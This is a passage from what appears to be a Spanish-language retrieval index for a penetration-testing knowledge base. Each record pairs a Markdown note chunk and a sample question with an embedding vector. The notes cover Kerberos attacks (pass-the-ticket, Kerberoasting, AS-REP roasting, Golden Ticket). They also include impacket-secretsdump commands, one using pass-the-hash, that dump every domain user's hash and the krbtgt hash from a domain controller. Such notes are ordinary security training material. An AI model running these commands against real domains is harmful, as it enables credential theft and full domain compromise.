0.05685, 0.03049, 0.03465, -0.00696, 0.07791, 0.02443, -0.00258, -0.13303, -0.04872, -0.07731, 0.07168, -0.09202, 0.03542, 0.01826, -0.03847, 0.03753, -0.00596, -0.02587, 0.06142, -0.04393, 0.05119, 0.03233, 0.05911, 0.01018, 0.03875, -0.11168, 0.00161, -0.02549, -0.01738, -0.0827, 0.00192, -0.01726, -0.02179, -0.00785, -0.02322, -0.06102, 0.10599, 0.0239, 0.04581, 0.06286, -0.01365, 0.04994, 0.04004, 0.00117, 0.01355, -0.05394, -0.03965, 0.00977, -0.05465, 0.02786, -0.01984, 0.00773, -0.03756, -0.0169, 0.05208, -0.04468, -0.00335, -0.05157, 0.03698, 0.02904, 0.0563, 0.02883, -0.00794, 0.00148, 0.04039, -0.01274, 0.04631, 0.0051, 0.03993, -0.04867, -0.08066, -0.0067, 0.04539, 0.02689, 0.024, 0.03882, -0.032, -0.03345, -0.03849, 0.00101, -0.04324, -0.07695, -0.00959, -0.00993, 0.05591, -0.00913, 0.00279, -0.04783]} -{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Conceptos\n- **TGT** = carnet maestro del KDC. Lo guarda el cliente.\n- **TGS** = ticket de un servicio concreto.\n- **krbtgt** = la cuenta que **firma TODOS los TGT**.", "indexar": "con que puedo ver o manipular el carnet maestro del KDC?", "v": [0.161, -0.07543, 0.02633, -0.09096, -0.12436, -0.02925, 0.03163, 0.29741, -0.14797, -0.13807, -0.00895, -0.02106, -0.07678, -0.17473, -0.00947, 0.09532, 0.23675, -0.02762, 0.0416, -0.01721, 0.08022, -0.12268, 0.10635, 0.02037, 0.02741, -0.01528, 0.02997, 0.00733, -0.13814, 0.03002, -0.01331, 0.05379, -0.063, -0.12042, 0.10123, -0.08011, -0.02235, 0.11365, 0.04003, 0.05414, 0.00348, 0.04185, -0.00281, 0.07561, -0.00345, -0.02011, 0.07516, 0.00261, -0.06018, 0.10331, -0.02314, -0.03388, 0.01262, -0.025, -0.01356, -0.09665, 0.04486, 0.01499, 0.06851, -0.10933, 0.10316, -0.01014, -0.06524, -0.00597, 0.02235, -0.04072, 0.10015, -0.00204, -0.07331, 0.03875, -0.08091, 0.00166, 0.13096, 0.01997, -0.06972, 0.00662, 0.0023, -0.03357, -0.03158, 0.03001, -0.09723, -0.01589, -0.00456, -0.04697, -0.01157, 0.04468, 0.05562, -0.09103, -0.01518, -0.13305, -0.0115, 0.09705, -0.00833, -0.01792, 0.11299, 0.01945, -0.03026, 0.00031, -0.0004, -0.0663, 0.10353, 0.06034, -0.10256, 0.02697, -0.0456, 0.05546, 0.068, 0.02315, -0.04745, 0.08011, 0.00558, 0.13271, -0.0406, 0.06227, -0.02847, 0.02201, -0.06117, 0.01562, -0.03911, -0.06286, -0.05684, -0.00515, -0.01077, -0.08779, 0.10618, 0.02625, -0.00463, 0.05761, 0.00415, -0.03966, -0.05849, 0.00821, -0.07942, -0.00258, 0.08614, -0.06586, 0.04384, -0.02569, -0.01149, 0.05391, 0.01473, 0.05447, 0.06125, -0.11605, 0.03023, 0.03831, 0.04882, -0.0732, -0.06963, -0.09198, -0.02857, 0.00659, 0.0728, 0.08657, 0.05902, -0.00949, 0.04281, -0.03334, 0.01975, -0.02163, -0.06485, 0.04186, 0.02435, 0.01573, -0.06605, 0.03581, -0.03803, -0.01435, 0.03981, 0.02349, -0.05941, 0.04459, 0.05387, 0.06549, -0.00823, -0.1185, -0.05461, -0.07464, 0.04054, -0.02871, 0.04106, 0.00329, -0.02802, -0.04733, 0.0009, -0.0352, -0.00199, -0.01737, 0.0891, -0.01063, 0.02948, 0.03148, -0.01081, -0.09205, -0.01278, -0.09557, -0.05628, 0.01254, -0.02685, -0.05254, 0.0302, 0.00456, -0.01554, -0.00436, 0.08414, 0.02916, 0.04772, 0.06072, 0.01121, 0.07984, 0.04322, -0.01252, 0.02671, -0.08126, -0.0114, 0.05071, -0.06051, -0.00386, 0.0025, 0.01332, 0.03482, 0.06562, 0.02905, 0.02349, 0.01168, -0.01672, 0.02712, 0.04398, 0.08508, 0.09616, -0.03957, -0.00589, 0.00809, -0.03182, -0.00816, 0.06673, 0.05543, -0.02233, -0.0672, -0.00168, 0.00722, 0.00754, 0.00362, 0.00646, -0.03619, -0.09177, -0.02672, -0.02904, 0.02909, -0.0435, 0.06534, -0.00573, 0.0572, -0.06673, 0.00668, -0.02813]} -{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Por quΓ© importa (los ataques)\n- Reutilizar un TGT/TGS vΓ‘lido = **pass-the-ticket**.\n- Pedir TGS de cuentas con SPN sin tenerlas = Kerberoasting.\n- Usuarios sin pre-auth = AS-REP Roasting.\n- Hash de **krbtgt** = forjar Golden Ticket (ser cualquiera, para siempre).\n\nRelacionado: Impacket Β· Mimikatz Β· OSCP MOC", "indexar": "ΒΏQuΓ© programa sirve para forjar un Golden Ticket?", "v": [-0.22258, -0.03893, 0.05812, -0.09926, 0.00734, -0.0617, -0.02601, -0.07352, 0.05882, -0.06037, 0.00101, -0.00939, -0.05245, 0.0503, 0.00403, 0.03133, 0.05832, -0.08787, 0.12845, 0.0875, 0.01866, 0.14516, 0.08001, -0.23866, -0.02231, -0.01973, 0.14757, -0.04199, -0.03551, 0.0353, 0.07832, -0.16917, -0.03042, -0.19603, -0.02267, -0.04195, 0.11343, 0.08342, -0.00626, -0.02271, 0.05135, -0.00906, 0.11426, 0.01322, 0.10973, -0.02007, 0.10882, 0.05648, -0.06473, -0.0225, -0.00625, 0.06515, 0.04112, 0.02497, 0.07417, -0.03689, -0.11998, -0.11194, -0.13189, 0.0483, -0.03808, -0.15975, -0.02889, -0.04047, -0.07894, 0.03042, 0.05755, 0.0443, 0.02599, -0.01144, -0.06901, 0.04198, 0.07975, 0.07558, 0.0094, -0.02237, 0.02464, -0.03185, 0.04095, 0.00635, 0.0649, 0.06276, 0.06203, 0.11363, 0.0569, 0.00753, 0.07602, -0.05104, -0.09052, -0.00505, -0.0768, 0.06505, 0.09025, 0.06498, 0.04431, -0.13397, 0.02423, -0.00725, -0.03782, 0.08524, 0.05149, -0.09594, -0.05482, 0.07583, -0.10119, 0.07996, 0.0418, -0.06027, -0.12022, 0.04315, -0.06059, 0.03723, -0.1493, -0.01255, -0.05321, 0.04791, 0.06373, 0.01186, 0.08531, -0.01414, -0.01109, 0.04907, -0.07198, -0.0221, 0.07794, 0.06925, -0.00778, 0.06864, 0.0034, 0.05465, -0.05255, 0.07139, -0.01027, -0.00636, -0.01284, -0.06881, 0.05576, -0.07596, 0.04278, 0.07217, 0.05965, -0.01082, 0.01916, 0.00016, -0.00323, -0.09691, 0.03895, 0.01216, 0.00064, -0.00688, 0.02866, -0.04396, -0.03611, 0.10018, -0.05005, -0.03356, 0.03929, -0.01697, -0.13006, 0.02189, -0.04297, 0.02224, -0.03288, -0.04122, 0.03289, 0.01906, -0.03371, 0.03536, 0.03843, 0.10771, 0.05139, 0.04238, 0.06338, -0.03743, -0.04378, -0.0506, -0.05738, -0.0661, 0.05667, -0.02557, 0.04116, 0.02178, 0.03478, 0.07514, -0.0071, 0.01794, -0.01351, -0.02042, 0.04084, 0.00035, -0.03214, -0.0369, 0.0318, 0.00971, -0.00094, -0.08891, -0.02023, -0.05334, 0.01934, -0.04896, -0.03081, -0.01594, -0.02167, 0.05049, 0.09402, 0.08599, 0.00803, -0.02474, 0.04653, 0.1364, -0.04928, 0.01196, 0.11019, 0.01659, -0.03366, -0.04888, 0.01066, 0.06691, 0.03165, 0.03023, 0.04962, -0.01728, 0.00774, 0.02886, 0.02517, -0.05129, 0.03428, 0.00327, 0.0536, 0.06312, 0.05156, -0.0198, -0.01811, 0.05249, 0.0195, -0.03643, 0.01165, -0.02781, -0.0128, -0.0051, -0.02605, 0.06391, -0.00095, 0.03258, 0.0142, 0.03924, 0.00957, 0.01879, 0.04678, 0.03083, -0.03819, 0.00917, 0.00335, -0.0609, 0.02745, 0.05056]} -{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Por quΓ© importa (los ataques)\n- Reutilizar un TGT/TGS vΓ‘lido = **pass-the-ticket**.\n- Pedir TGS de cuentas con SPN sin tenerlas = Kerberoasting.\n- Usuarios sin pre-auth = AS-REP Roasting.\n- Hash de **krbtgt** = forjar Golden Ticket (ser cualquiera, para siempre).\n\nRelacionado: Impacket Β· Mimikatz Β· OSCP MOC", "indexar": "Con quΓ© puedo montar un ataque de tipo pass-the-ticket?", "v": [-0.10234, 0.0991, -0.2344, -0.07058, -0.14446, 0.01533, 0.03763, 0.11985, -0.09384, 0.05277, -0.04733, -0.04978, 0.0304, 0.05655, 0.07221, 0.01599, 0.08159, 0.01811, 0.18914, -0.09225, -0.00734, -0.06732, 0.06452, -0.08221, 0.01908, 0.10636, -0.0051, 0.04582, -0.13634, -0.09314, 0.00231, -0.01375, 0.03512, 0.03478, 0.08295, -0.07492, 0.03864, 0.13521, 0.11078, -0.02732, -0.01711, -0.04844, -0.10612, 0.07824, 0.00814, -0.15883, 0.02074, 0.07402, 0.00692, -0.05326, 0.15195, 0.00925, -0.14172, -0.00133, -0.07389, -0.09225, 0.04804, 0.01365, 0.04353, 0.04771, -0.06376, 0.05086, -0.05138, 0.05509, -0.00665, 0.00205, 0.00208, -0.04698, -0.05281, -0.0943, -0.0629, -0.07197, 0.03128, 0.09063, 0.02869, 0.03011, 0.07048, 0.04293, 0.10742, 0.04822, 0.04323, 0.03357, -0.08166, -0.02657, -0.00785, -0.03375, 0.04692, -0.09662, -0.01501, 0.0849, 0.082, 0.04339, 0.11785, -0.04276, -0.10751, -0.15468, -0.03876, -0.02757, -0.06048, -0.05262, -0.12453, -0.01248, -0.07258, 0.14315, 0.01878, 0.00297, 0.03055, -0.03612, 0.04927, -0.06089, 0.01607, 0.00709, -0.14949, -0.04445, -0.01675, -0.08633, -0.03037, 0.05587, 0.0195, 0.06491, -0.03545, 0.08018, 0.06441, -0.04941, 0.01239, 0.00042, 0.00231, 0.09147, -0.04584, 0.0038, -0.00139, 0.0492, -0.02714, -0.00494, -0.04037, 0.03064, 0.00691, -0.08706, -0.03755, 0.06917, 0.05386, 0.05239, -0.00191, 0.03682, 0.02519, 0.02549, -0.02225, -0.06589, -0.12372, 0.00097, 0.03674, 0.03709, 0.07647, 0.10969, -0.03482, -0.00278, 0.06079, -0.05659, -0.00011, 0.13525, -0.03173, 0.05122, -0.08817, 0.05543, 0.01144, -0.02046, -0.04961, -0.06641, 0.05628, 0.02232, -0.01516, 0.01568, 0.06714, 0.00268, 0.05508, -0.06705, -0.07476, -0.02753, 0.07629, -0.03142, 0.05628, -0.06382, -0.00515, 0.02818, -0.04999, -0.0503, 0.05595, -0.01566, 0.05591, 0.07492, -0.0234, 0.02413, 0.00611, 0.04846, -0.04664, -0.05747, -0.07125, -0.01033, -0.02444, 0.00227, 0.01519, -0.00317, -0.01238, -0.03281, 0.11292, 0.02973, -0.05878, 0.02046, 0.04289, 0.08859, 0.07118, -0.03568, 0.08458, -0.07064, -0.04761, -0.00367, 0.01978, 0.01235, -0.02547, 0.01993, 0.08814, 0.02223, 0.02611, 0.02597, 0.02596, -0.04837, -0.02489, -0.05596, 0.06172, 0.0406, 0.01837, -0.02617, 0.04668, -0.00804, 0.02476, -0.00864, 0.01143, -0.01757, -0.13082, 0.02478, 0.05111, 0.0234, 0.02218, -0.01484, -0.04377, -0.00995, -0.07122, 0.02516, -0.0003, -0.0488, -0.02069, 0.00467, -0.03737, -0.01997, 0.03919, -0.04617]} -{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Por quΓ© importa (los ataques)\n- Reutilizar un TGT/TGS vΓ‘lido = **pass-the-ticket**.\n- Pedir TGS de cuentas con SPN sin tenerlas = Kerberoasting.\n- Usuarios sin pre-auth = AS-REP Roasting.\n- Hash de **krbtgt** = forjar Golden Ticket (ser cualquiera, para siempre).\n\nRelacionado: Impacket Β· Mimikatz Β· OSCP MOC", "indexar": "Cual es una herramienta para generar un Golden Ticket usando el hash del krbtgt?", "v": [0.01024, -0.18922, 0.02132, -0.07331, -0.01672, -0.1583, -0.09978, 0.17821, 0.03192, -0.04061, -0.17744, 0.01365, -0.12451, 0.10999, 0.01501, 0.03618, -0.07694, -0.08315, -0.04234, 0.09347, 0.02683, 0.06516, -0.00587, -0.07347, -0.09758, -0.06688, 0.02665, 0.01528, -0.20043, 0.08336, 0.10393, -0.11526, -0.16679, -0.07092, -0.16881, -0.09973, -0.03566, 0.19274, -0.02026, 0.06332, 0.01145, -0.01876, -0.0537, 0.14002, 0.0827, -0.08832, -0.05542, 0.04883, -0.09662, 0.09306, -0.01703, -0.05957, -0.19798, -0.04612, 0.03876, -0.12968, 0.04225, -0.1703, -0.08394, -0.06795, -0.09488, -0.07054, -0.09714, 0.0053, -0.08979, 0.00183, -0.02981, -0.03212, -0.04492, 0.02507, -0.04834, 0.10639, -0.0074, 0.03619, 0.11993, 0.02722, 0.0393, 0.04215, 0.04857, 0.07594, 0.0214, -0.05225, 0.02196, 0.03697, -0.04504, -0.1116, 0.13109, -0.09444, -0.03413, -0.02469, -0.02395, 0.05176, 0.06881, 0.0378, 0.00706, -0.07933, -0.01204, -0.04422, -0.05388, 0.06222, 0.07704, -0.04579, -0.07989, 0.09643, -0.03757, 0.00572, 0.04017, -0.04169, -0.02557, 0.02499, -0.00158, 0.01476, -0.06674, -0.03417, -0.00966, 0.06248, 0.04371, -0.11524, 0.05427, -0.07554, 0.07825, 0.02445, -0.05186, -0.03646, 0.03014, -0.00027, -0.0992, 0.01989, 0.0174, -0.04262, -0.03823, 0.04351, -0.0249, 0.03587, -0.02809, -0.01703, 0.02582, -0.10555, 0.00403, -0.04023, -0.01183, 0.01955, -0.02084, -0.12272, 0.02672, -0.05714, -0.04322, -0.00992, 0.00711, -0.01793, -0.00722, -0.05098, -0.00739, 0.04507, -0.06388, -0.01641, -0.05984, -0.00028, -0.11479, 0.01109, -0.02236, -0.04194, 0.01544, 0.03419, 0.00332, -0.00132, 0.01064, 0.05776, 0.04036, 0.02623, 0.10077, -0.00671, 0.07314, 0.02533, 0.00933, -0.04441, -0.03518, -0.01034, 0.00281, -0.08218, 0.04191, -0.01057, -0.02677, 0.01105, -0.0198, -0.01566, 0.08354, -0.00266, 0.0625, 0.03702, -0.05696, 0.02714, 0.00382, -0.00403, 0.02311, -0.0356, 0.03606, -0.05054, 0.05148, -0.02251, -0.03854, 0.04189, 0.00194, -0.02554, 0.07045, 0.01036, -0.01408, 0.00306, -0.04099, 0.04378, 0.03517, -0.0163, 0.06471, -0.02052, 0.00484, 0.02095, -0.03572, 0.01478, -0.02834, 0.00152, 0.04196, 0.0267, 0.02527, -0.02744, -0.00551, 0.02646, 0.02131, 0.01696, 0.03836, 0.01823, 0.02999, -0.0126, -0.02351, 0.05014, 0.04921, -0.0199, 0.00466, -0.01199, -0.05522, -0.02849, 0.00254, 0.03747, -0.02537, 0.0573, 0.00446, -0.01814, -0.01118, 0.02403, 0.02655, -0.04433, 0.00546, -0.01507, 0.03777, -0.07106, 0.00511, -0.04056]} -{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# secretsdump (NTDS.dit / SAM)\n\n> `impacket-secretsdump` vuelca **todos los hashes** del dominio (NTDS.dit) o de una mΓ‘quina (SAM/SYSTEM), en remoto o desde ficheros. Parte de Impacket.", "indexar": "que herramienta puedo usar para extraer todos los hashes del dominio?", "v": [0.06248, -0.01195, -0.17546, -0.10652, -0.00424, -0.04567, -0.04158, -0.05665, -0.11674, 0.0127, -0.1341, -0.03486, -0.07575, -0.13259, 0.00529, -0.0107, 0.19718, -0.05215, -0.106, -0.05073, -0.02, -0.00787, -0.18421, 0.00102, -0.05077, -0.06492, -0.04272, -0.00286, -0.23493, 0.11292, -0.01991, 0.02484, -0.00715, -0.01003, -0.11402, -0.03865, -0.00984, 0.086, 0.06973, 0.08774, 0.04258, 0.05131, -0.15908, 0.0531, -0.0764, 0.0139, -0.03873, -0.03465, -0.0124, -0.02788, 0.04872, -0.16052, -0.20952, -0.02062, 0.04052, -0.16096, 0.18252, -0.10326, -0.07349, -0.13138, -0.07239, -0.01464, -0.04431, -0.00423, -0.07677, -0.11999, 0.01009, 0.00958, -0.10406, 0.08555, -0.04868, 0.05775, 0.10109, 0.02396, 0.04984, -0.00506, 0.04593, -0.03888, 0.08169, -0.02178, 0.01052, -0.03232, 0.00814, -0.06289, -0.12682, -0.08308, 0.03078, -0.1329, 0.06128, -0.02004, 0.025, 0.05783, -0.04924, -0.08389, -0.017, -0.04561, 0.05031, -0.02465, -0.02977, -0.06252, 0.14899, 0.01198, -0.07099, 0.10423, 0.07058, 0.01089, 0.03398, -0.04282, -0.01211, -0.00361, 0.02711, -0.06273, -0.05445, -0.03225, -0.07532, 0.09934, -0.06655, 8e-05, -0.0518, -0.06355, 0.00055, -0.03748, 0.04041, -0.01811, 0.06784, -0.04939, -0.03288, 0.02482, -0.05544, -0.15861, -0.00289, -0.00229, -0.06736, 0.01195, 0.01687, 0.04627, 0.06468, -0.05559, -0.01477, -0.05371, 0.01731, 0.00483, -0.10783, -0.07453, 0.01146, -0.04355, 0.00229, -0.0459, -0.02684, -0.05976, 0.05286, -0.06546, 0.01365, 0.02669, -0.02902, 0.05319, -0.03935, 0.02086, -0.07431, 0.0259, -0.11735, -0.09039, 0.02586, 0.01874, 0.04722, -0.02941, 0.04083, -0.01963, 0.0034, 0.06276, 0.05148, 0.02437, 0.05955, -0.01266, 0.01673, -0.02307, -0.01198, 0.01806, -0.02698, -0.05419, -0.02208, -0.05215, -0.02913, 0.01055, -0.00465, 0.02776, 0.07403, 0.00014, -0.03876, 0.0326, -0.00044, 0.09004, -0.00694, -0.01014, 0.00275, 0.00743, 0.03653, -0.03968, 0.0466, -0.03886, -0.0279, 0.0138, 0.00813, -0.04216, 0.01721, 0.0283, -0.04534, -0.05234, 0.0023, 0.01217, 0.01074, -0.00184, 0.01092, -0.02005, -0.02959, 0.02928, -0.03066, 0.01701, -0.0472, -0.08421, -0.01973, 0.07582, 0.05032, -0.01521, 0.00995, 0.04965, 0.00455, 0.0252, 0.00404, 0.01472, 0.02341, 0.00524, -0.01832, -0.00449, -0.01134, -0.05076, 0.03915, 0.01067, -0.04564, -0.00703, -0.0545, 0.03924, 0.02042, 0.00028, -0.07087, -0.0469, -0.03877, 0.04023, -0.04071, -0.07422, 0.01966, -0.00645, 0.06901, -0.02064, -0.01456, 0.0413]} -{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# secretsdump (NTDS.dit / SAM)\n\n> `impacket-secretsdump` vuelca **todos los hashes** del dominio (NTDS.dit) o de una mΓ‘quina (SAM/SYSTEM), en remoto o desde ficheros. Parte de Impacket.", "indexar": "cual es el programa para volcar hashes de NTDS.dit y SAM remotamente?", "v": [-0.0739, -0.20446, -0.01253, -0.0033, 0.00285, -0.05086, -0.03969, -0.00196, -0.03959, 0.25917, -0.16981, -0.13529, 0.0502, -0.09856, -0.0327, 0.11691, 0.0646, -0.07284, 0.09223, 0.11673, -0.03052, -0.11514, -0.04684, -0.00088, -0.02207, -0.02069, -0.00958, 0.0477, -0.14563, 0.00562, 0.09644, -0.05586, -0.03669, -0.04371, -0.04017, -0.00438, 0.0351, 0.03642, 0.06972, 0.07908, 0.03843, 0.13511, -0.08307, 0.05318, 0.11711, -0.14157, 0.02338, -0.04044, 0.1198, -0.16825, -0.06462, 0.10924, -0.07307, -0.07797, 0.08052, -0.0873, 0.0681, -0.09363, -0.12834, 0.05346, -0.00681, -0.03835, 0.06183, -0.11046, -0.01061, -0.20764, 0.09363, -0.03271, -0.06471, 0.09004, -0.00771, 0.00895, 0.07564, -0.08807, -0.07331, 0.02801, -0.12018, -0.02112, 0.06947, -0.08173, 0.01047, -0.1002, 0.02814, 0.05261, -0.08801, -0.03367, 0.02616, -0.01887, -0.04283, -0.01528, 0.02279, 0.0235, 0.02928, 0.08547, 0.0578, -0.0617, 0.08405, 0.0328, -0.00154, -0.03322, 0.02995, -0.03959, -0.04324, 0.09195, -0.12282, 0.06542, 0.08472, -0.01148, -0.01321, 0.07751, 0.13363, -0.00257, -0.03458, 0.03401, -0.06241, -0.08338, -0.01706, 0.05999, 0.01328, -0.01979, -0.02045, 0.02029, 0.00724, 0.00238, 0.14386, 0.00561, -0.0371, 0.08361, -0.03653, 0.05648, 0.07584, -0.0284, -0.03713, -0.05928, 0.05192, -0.05529, -0.0224, -0.04289, 0.01277, -0.08329, 0.07008, 0.04544, 0.06834, 0.02629, 0.05156, -0.00845, -0.03958, -0.01922, 0.0521, 0.04781, 0.05266, 0.03611, 0.02548, 0.05025, -0.03398, 0.01074, -0.0084, 0.03075, -0.10123, 0.03588, -0.0256, 0.01113, 0.02977, -0.05113, 0.02978, -0.04615, -0.00092, -0.0381, 0.03932, 0.01141, -0.04761, 0.00056, 0.00414, -0.01533, -0.03284, -0.06666, 0.0676, -0.06137, -0.02945, -0.08324, -0.06021, 0.01212, 0.06332, -0.01564, 0.03304, -0.05575, -0.00098, 0.05014, -0.00648, -0.05429, 0.01663, 0.00903, -0.05754, -0.00114, 0.00603, 0.00053, -0.03132, -0.05494, 0.05041, -0.00247, -0.05772, -0.06218, -0.00155, -0.01765, 0.06113, 0.04695, -0.02167, 0.03709, 0.00559, 0.09144, 0.05556, -0.01721, 0.03502, -0.01332, -0.09609, -0.01973, -0.02747, 0.01947, 0.04503, 0.0675, -0.01696, 0.016, 0.04314, 0.05021, -0.01489, -0.00883, 0.06798, 0.06825, 0.05519, -0.02432, -0.00693, -0.01634, -0.01177, -0.01933, 0.00627, 0.03424, 0.00604, -0.00416, -0.00626, -0.0541, 0.01147, 0.09526, -0.00174, -0.05419, -0.00353, -0.00414, -0.07027, 0.03581, -0.00178, -0.00033, -0.00317, -0.02887, 0.03053, -0.03096, 0.02473, 0.02216]} -{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Remoto contra un DC\n```bash\nimpacket-secretsdump dominio/usuario:password@DC_IP\nimpacket-secretsdump -hashes :NTLMHASH dominio/admin@DC_IP # con Pass-the-Hash\n```\nSaca NTLM de **todos** los usuarios + el hash de **krbtgt** β†’ Golden Ticket.", "indexar": "que herramienta sirve para sacar los hashes de todos los usuarios de un dominio?", "v": [0.0181, -0.02507, -0.20361, -0.13706, -0.02514, -0.2067, -0.0333, -0.10802, -0.02808, 0.09873, -0.07055, -0.10008, 0.0164, -0.17861, 0.0266, 0.03414, 0.15883, -0.05466, -0.05773, 0.02864, 0.01944, 0.04961, -0.0819, 0.00132, -0.08108, -0.08587, -0.00295, -0.08863, -0.23942, 0.15164, 0.02713, -0.03709, -0.04602, -0.05983, -0.08984, -0.05507, 0.00317, 0.04353, 0.06087, 0.14256, 0.02402, 0.05816, -0.17001, -0.00245, -0.06046, 0.05085, -0.07486, -0.01205, 0.05344, 0.00137, 0.0255, -0.1522, -0.15116, 0.0245, -0.02826, -0.16105, 0.13035, -0.10972, -0.05444, -0.14147, -0.16101, -0.02234, -0.02387, 0.02, -0.03436, -0.13218, 0.02447, -0.02818, -0.03095, 0.06159, -0.02537, 0.07679, 0.07498, -0.01563, 0.02026, -0.00778, 0.03795, 0.01313, 0.04731, -0.03721, 0.06696, -0.04146, -0.04052, -0.07059, -0.12149, -0.07813, 0.03611, -0.09123, 0.06266, -0.00713, 0.03896, 0.11933, -0.04944, -0.04183, -0.02185, -0.01133, 0.11116, -0.06085, 0.00095, -0.06978, 0.13058, 0.00845, -0.08091, 0.06129, 0.04095, 0.04271, 0.03696, -0.08618, -0.04954, -0.00393, 0.06693, -0.07676, -0.00853, 0.00702, -0.03893, 0.09382, -0.05398, -0.02961, -0.03797, -0.02572, -0.01128, -0.03911, 0.064, -0.04798, 0.04888, -0.01092, -0.03762, 0.01067, -0.01853, -0.13386, 0.00016, -0.01742, -0.07009, 0.05853, -0.01517, 0.01217, 0.04652, -0.04945, -0.044, -0.03461, 0.03188, 0.08189, -0.11332, -0.1071, 0.03885, -0.05667, 0.04131, -0.05568, -0.035, -0.05187, -0.00979, -0.04449, -0.01961, 0.02112, -0.03754, 0.0479, -0.07807, -0.01393, -0.07565, 0.02565, -0.07918, -0.06152, 0.06159, 0.01486, 0.01183, -0.02782, 0.02144, -0.01827, 0.07694, 0.04357, 0.0334, 0.0076, 0.04288, -0.00749, 0.01967, -0.03813, -0.02607, 0.00708, -0.02826, -0.04034, -0.03662, -0.08713, -0.0249, 0.03754, -0.03627, 0.01243, 0.0363, -0.0304, -0.00586, 0.03917, 0.02397, 0.06514, -0.04809, -0.01015, 0.03134, -0.02007, 0.00903, -0.01767, 0.04844, -0.03559, -0.03874, 0.00602, 0.01543, -0.00776, 0.01314, 0.03734, -0.00234, -0.05199, 0.01559, 0.01562, 0.00395, -0.00979, -0.00106, -0.01963, -0.01135, 0.01256, 0.02703, 0.00938, -0.04843, -0.06066, -0.03085, 0.04947, 0.00618, -0.02391, -0.01097, 0.0665, 0.01161, 0.00016, 0.01446, 0.00036, 0.01365, -0.00025, -0.03422, 0.00498, 0.01364, -0.05615, 0.04934, 0.00563, -0.05254, -0.03151, -0.05021, 0.04543, 0.0162, -0.02309, -0.06875, -0.06119, -0.02549, 0.01019, -0.04334, -0.05971, -0.0116, -0.00859, 0.07398, -0.003, -0.01528, 0.00795]} -{"tipo": "pregunta", "herramienta": "secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Remoto contra un DC\n```bash\nimpacket-secretsdump dominio/usuario:password@DC_IP\nimpacket-secretsdump -hashes :NTLMHASH dominio/admin@DC_IP # con Pass-the-Hash\n```\nSaca NTLM de **todos** los usuarios + el hash de **krbtgt** β†’ Golden Ticket.", "indexar": "con que puedo extraer el hash de krbtgt y crear un golden ticket?", "v": [0.11188, -0.15706, -0.06618, 0.01734, 0.0502, -0.09889, -0.00825, 0.25523, -0.03562, -0.07378, -0.17251, -0.035, -0.01353, 0.05311, 0.06227, 0.04571, -0.06955, 0.03196, 0.04032, 0.06052, 0.05263, 0.01778, 0.00142, -0.03558, 0.00088, -0.10539, -0.05994, 0.16958, -0.21715, 0.09539, 0.02337, -0.06765, -0.17257, 0.00578, -0.04773, -0.0092, 0.04013, 0.21656, -0.05523, -0.00714, 0.02219, -0.07382, 0.01578, 0.18023, -0.00573, -0.10445, -0.00696, 0.07748, -0.07746, -0.02751, -0.00151, -0.02515, -0.22635, -0.03114, -0.0065, -0.08104, -0.01261, -0.1626, -0.10293, -0.01052, -0.03865, -0.02568, -0.11132, -0.04862, -0.07578, 0.05901, -0.00153, -0.01483, -0.01786, -0.01723, -0.11327, 0.03879, -0.035, 0.07398, 0.07103, 0.08262, 0.01551, -0.02446, 0.00651, 0.03197, -0.03694, -0.05611, 0.01886, -0.09674, -0.01808, -0.10266, 0.10002, -0.06362, -0.04608, 0.00135, 0.08078, 0.05514, 0.08507, -0.00893, -0.0416, -0.07951, 0.00112, 0.00142, -0.06246, 0.04308, -0.07322, -0.03072, -0.08773, 0.14518, -0.00012, 0.00715, 0.14204, 0.01426, 0.05001, -0.00401, -0.04626, -0.00547, -0.08677, -0.08289, -0.07294, -0.002, -0.03134, 0.00371, 0.01951, 0.01778, 0.00141, -0.07906, 0.05631, -0.03554, 0.07183, -0.06392, -0.0834, 0.06529, 0.06231, 0.03549, -0.01777, 0.11675, -0.01174, -0.00511, -0.02003, 0.02433, 0.01577, 0.04391, 0.02194, 0.00303, 0.0037, 0.00472, -0.00142, -0.10331, 0.01021, -0.05111, -0.06657, -0.04512, -0.00896, -0.03794, -0.02704, -0.00585, 0.04418, 0.07627, -0.06116, 0.00259, 0.01403, 0.00023, -0.03428, 0.01257, -0.02321, 0.02919, 0.0085, 0.05578, 0.01313, 0.02438, -0.08025, -0.03769, 0.02672, -0.00966, 0.00215, -0.02382, 0.09523, -0.00346, 0.04516, -0.00197, -0.01346, -0.03425, 0.01912, -0.05502, 0.02262, -0.0284, -0.03651, 0.00239, -0.02418, -0.05856, 0.0867, -0.00927, 0.03989, 0.01304, -0.04794, 0.04762, -0.02762, 0.07458, -0.08567, -0.03786, 0.02116, -0.0454, 0.00859, -0.06877, -0.00854, 0.06474, 0.02728, -0.05012, 0.0003, -0.01023, -0.0333, 0.05076, -0.03534, 0.03548, 0.08006, -0.02346, 0.08925, -0.04537, -0.05868, 0.02128, 0.01599, -0.03203, -0.05042, -0.02008, 0.0555, 0.0406, 0.03471, -0.021, 0.02388, -0.02203, 0.0358, 0.03578, 0.06083, 0.03463, 0.00769, 0.02174, -0.02359, 0.02028, 0.03611, 0.0472, 0.00357, -0.02009, -0.0866, -0.02113, 0.02264, 0.04267, -0.02535, 0.02781, 0.01962, -0.01598, -0.05966, 0.07196, 0.02027, -0.08855, 0.00142, -0.03968, 0.03137, 